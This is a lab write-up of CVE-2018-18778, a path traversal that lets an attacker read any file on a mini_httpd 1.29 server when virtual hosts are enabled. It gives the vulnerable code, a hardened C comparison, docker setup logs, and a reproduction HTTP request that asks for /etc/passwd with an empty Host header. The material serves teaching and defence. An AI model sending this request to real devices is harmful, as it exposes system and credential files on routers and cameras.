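Vulnerability Overview
mini_httpd is a tiny HTTP server that keeps reasonable performance (about 90% of Apache's) while using few system resources, so it is widely used as the embedded web server in IoT devices (routers, switches, cameras, and so on). Vendors including Huawei, Zyxel, Hikvision and Raspberry Pi have all shipped devices that use the mini_httpd component.
When mini_httpd runs with virtual host mode enabled, a request for http://HOST/FILE is served from the file HOST/FILE under the current directory.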
(void) snprintf( vfile, sizeof(vfile), "%s/%s", req_hostname, f );
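Given the code above, the analysis is as follows:
- When HOST=example.com and FILE=index.html, the statement produces example.com/index.html and the file is read normally.
- When HOST is empty and FILE=etc/passwd, the statement produces /etc/passwd.
The latter is treated as an absolute path, so /etc/passwd is read, which results in an arbitrary file read vulnerability.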
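The path construction above next to a checked variant, as an added example (not code from mini_httpd or its upstream patch). The function names and the rejection rules are assumptions chosen for illustration, and the inputs are constructed.

```c
#include <stdio.h>
#include <string.h>

/* The construction shown on the page: host and file are joined with no
 * check, so an empty host turns "etc/passwd" into "/etc/passwd". */
int vhost_path_unchecked(char *out, size_t n, const char *host, const char *file)
{
    return snprintf(out, n, "%s/%s", host, file);
}

/* Hypothetical hardened helper: 0 on success, -1 if the request is rejected. */
int vhost_path_checked(char *out, size_t n, const char *host, const char *file)
{
    int len;

    if (host == NULL || host[0] == '\0')               /* empty Host header */
        return -1;
    if (host[0] == '.' || strchr(host, '/') != NULL)   /* "..", "a/b", "/x" */
        return -1;
    if (file == NULL || file[0] == '/')                /* file must be relative */
        return -1;

    len = snprintf(out, n, "%s/%s", host, file);
    if (len < 0 || (size_t)len >= n)                   /* truncated path */
        return -1;
    return 0;
}

int main(void)
{
    /* Constructed sample inputs: {Host header value, requested file}. */
    const char *cases[][2] = {
        { "example.com", "index.html" },
        { "",            "etc/passwd" },
        { "../other",    "index.html" },
    };
    char raw[256], safe[256];
    size_t i;

    for (i = 0; i < sizeof(cases) / sizeof(cases[0]); i++) {
        vhost_path_unchecked(raw, sizeof(raw), cases[i][0], cases[i][1]);
        if (vhost_path_checked(safe, sizeof(safe), cases[i][0], cases[i][1]) == 0)
            printf("host=\"%s\" unchecked=%s checked=%s\n", cases[i][0], raw, safe);
        else
            printf("host=\"%s\" unchecked=%s checked=REJECTED\n", cases[i][0], raw);
    }
    return 0;
}
```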
Environment Setup
Run the following commands to start mini_httpd 1.29:
┌──(root💀guiltyfet)-[/home/guiltyfet/vulhub/mini_httpd]
└─# cd CVE-2018-18778
┌──(root💀guiltyfet)-[/home/guiltyfet/vulhub/mini_httpd/CVE-2018-18778]
└─# docker-compose up -d
Creating network "cve-2018-18778_default" with the default driver
Pulling web (vulhub/mini_httpd:1.29)...
1.29: Pulling from vulhub/mini_httpd
61be48634cb9: Pull complete
fa696905a590: Pull complete
be37244639af: Pull complete
1a50d92daf1a: Pull complete
Digest: sha256:14536977b28d9ef67df67bda62dec54b76bc756460bbd0b0786feabf69ff7535
Status: Downloaded newer image for vulhub/mini_httpd:1.29
Creating cve-2018-18778_web_1 ... done
┌──(root💀guiltyfet)-[/home/guiltyfet/vulhub/mini_httpd/CVE-2018-18778]
└─#
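Once the environment is up, visit http://127.0.0.1:8080 to see the web page.
Vulnerability Reproduction
When sending the request, leave the Host header empty and set the path to the absolute path of the file: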
GET /etc/passwd HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: hblid=OCkAkPEOWHj8QX5o3m39N0H02BOA0I12; olfsk=olfsk8528760320823083; ECS[visit_times]=1; mage-cache-storage=%7B%7D; mage-cache-storage-section-invalidation=%7B%7D; mage-messages=; recently_viewed_product=%7B%7D; recently_viewed_product_previous=%7B%7D; recently_compared_product=%7B%7D; recently_compared_product_previous=%7B%7D; product_data_storage=%7B%7D; section_data_ids=%7B%22cart%22%3A1638415333%2C%22customer%22%3A1638415332%2C%22compare-products%22%3A1638415332%2C%22product_data_storage%22%3A1638415332%2C%22last-ordered-items%22%3A1638415332%2C%22directory-data%22%3A1638415332%2C%22instant-purchase%22%3A1638415332%2C%22review%22%3A1638415332%2C%22wishlist%22%3A1638415332%2C%22recently_viewed_product%22%3A1638415332%2C%22recently_compared_product%22%3A1638415332%2C%22paypal-billing-agreement%22%3A1638415332%7D; mage-cache-sessid=true; private_content_version=e48e945c4e066c5afa30b51edd7c4541
Upgrade-Insecure-Requests: 1
Pragma: no-cache
Cache-Control: no-cache
If the request carries no cookie, session or similar values, the response is UNKNOWN 408 Request Timeout.